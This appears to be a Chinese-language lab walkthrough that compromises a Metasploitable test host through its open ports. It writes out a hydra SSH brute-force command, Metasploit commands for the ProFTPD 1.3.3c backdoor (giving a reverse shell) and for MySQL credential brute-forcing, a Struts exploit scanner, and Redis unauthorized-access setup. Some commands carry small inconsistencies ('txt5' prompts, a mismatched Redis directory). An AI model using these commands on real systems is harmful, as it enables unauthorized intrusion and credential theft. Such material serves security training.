常见的端口漏洞入侵主机
端口漏洞利用
当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵
一旦端口开放的话就可以从外部访问,操作系统都有或多或少的漏洞,特殊的请求或者指令触发之后就可以提升权限
实验环境
同一网段的两台主机:
入侵主机:kali
目标主机ip:192.168.31.69
使用kali和它本身自带的一些工具对受害主机进行入侵
先利用nmap对受害主机进行扫描查看其开启了哪些端口和服务
访问该ip发现80端口是一个phpinfo页面,无法利用80端口入侵
所以我们开始尝试从其他端口入侵该主机
22端口漏洞利用
发现其开启了22端口,22端口是SSH远程登录协议。最有可能利用的是弱口令的入侵。
使用kali自带hydra来进行暴力破解22端口
暴力破解ssh命令:
hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh
参数详解:
-L //暴力破解用户名字典
-P //暴力破解密码字典
-o ssh.log //输出到这个文件里
-vV //显示过程
-f //搜到账号密码就停止
经过一段时间的等待发现功夫不负有心人,还真破解出了22端口的登录账号密码
然后我们就可以使用破解出来的账号密码成功利用22端口远程登录主机并且发现是root权限
21端口漏洞利用
通过nmap扫描知道21端口开启的ftp版本是ProFTPD 1.3.3c,百度发现ProFTPD 1.3.3c有个后门命令执行漏洞
启动msfconsole
搜索ProFTPD 1.3.3c查看其漏洞模块
search ProFTPD 1.3.3c
切换到该漏洞模块下,并设置好目标ip
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS 192.168.31.69
run
成功反弹shell会话
3306端口漏洞利用
发现该主机还开启了3306端口,那么我们如何利用3306端口入侵目标主机呢?
3306端口是MySQL的默认端口,入侵者可以通过入侵3306端口来入侵我们的主机,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库
启动msfconsole
扫描mysql模块
msf5 > search mysql
选择MySQL可用模块,在模块中选择渗透工具模块进行攻击
这里我们切换到mysql扫描模块,设置模块有效选项
msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #设置目标ip
txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #设置用户名字典
txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #设置密码字典
msf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功时停止
msf5 auxiliary(scanner/mysql/mysql_login) >run #开始爆破
成功爆破出MySQL用户名密码
利用爆破出的账号密码成功登录MySQL数据库
8080端口入侵
发现8080端口有一个网站Struts,百度发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell
下载Struts Scan解压,并切换到struts-scan-master目录下
执行root@kali:~/桌面/struts-scan-master# python struts-scan.py
出现如下界面则安装成功
使用给出的指定漏洞交互shell执行payload
成功获得交互式shell
6379端口漏洞入侵
该主机还开启了6379端口,发现6379端口可以利用Redis未授权访问漏洞来入侵
在本地下载Redis并解压安装
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar xzf redis-4.0.8.tar.gz
cd redis-3.2.0
make
修改配置文件,使可以远程访问
在bind 127.0.0.1前面加上#将其注释掉
把protected-mode后面的yes设为no
启动redis-server
./src/redis-server redis.conf
如果报错执行下列命令
cd /root/redis-4.0.8/src
然后连接redis发现成功连接
